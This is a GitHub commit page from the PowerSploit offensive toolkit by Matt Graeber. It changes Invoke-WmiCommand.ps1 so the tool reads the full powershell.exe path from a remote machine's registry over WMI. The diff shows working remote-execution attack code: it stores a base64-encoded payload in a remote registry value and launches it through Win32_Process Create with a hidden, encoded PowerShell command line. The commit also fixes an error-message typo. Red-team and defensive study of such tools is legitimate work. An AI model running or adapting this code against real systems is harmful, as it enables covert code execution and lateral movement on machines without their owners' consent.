Skip to content

Commit f6e032c

Browse files
author
Matt Graeber
committed
Invoke-WmiCommand now obtains full powershell path
Addresses issue PowerShellMafia#95.
1 parent 924103a commit f6e032c

File tree

1 file changed

+16
-2
lines changed

1 file changed

+16
-2
lines changed

CodeExecution/Invoke-WmiCommand.ps1

Lines changed: 16 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -209,6 +209,8 @@ the output of your payload back. :P
209209
'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 }
210210
}
211211

212+
$HKEY_LOCAL_MACHINE = 2147483650
213+
212214
$WmiMethodArgs = @{}
213215

214216
# If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod
@@ -253,6 +255,18 @@ the output of your payload back. :P
253255
throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand."
254256
}
255257

258+
$PSSettingsPath = 'SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
259+
$PSPathValueName = 'Path'
260+
261+
$Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName
262+
263+
if ($Result.ReturnValue -ne 0) {
264+
throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName"
265+
}
266+
267+
$PowerShellPath = $Result.sValue
268+
Write-Verbose "Full PowerShell path: $PowerShellPath"
269+
256270
$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))
257271

258272
Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
@@ -293,15 +307,15 @@ the output of your payload back. :P
293307

294308
$Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner))
295309

296-
$Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
310+
$Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
297311

298312
# Execute the payload runner on the remote system
299313
$Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline
300314

301315
Start-Sleep -Seconds 5
302316

303317
if ($Result.ReturnValue -ne 0) {
304-
throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
318+
throw "[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
305319
}
306320

307321
Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"

0 commit comments

Comments
 (0)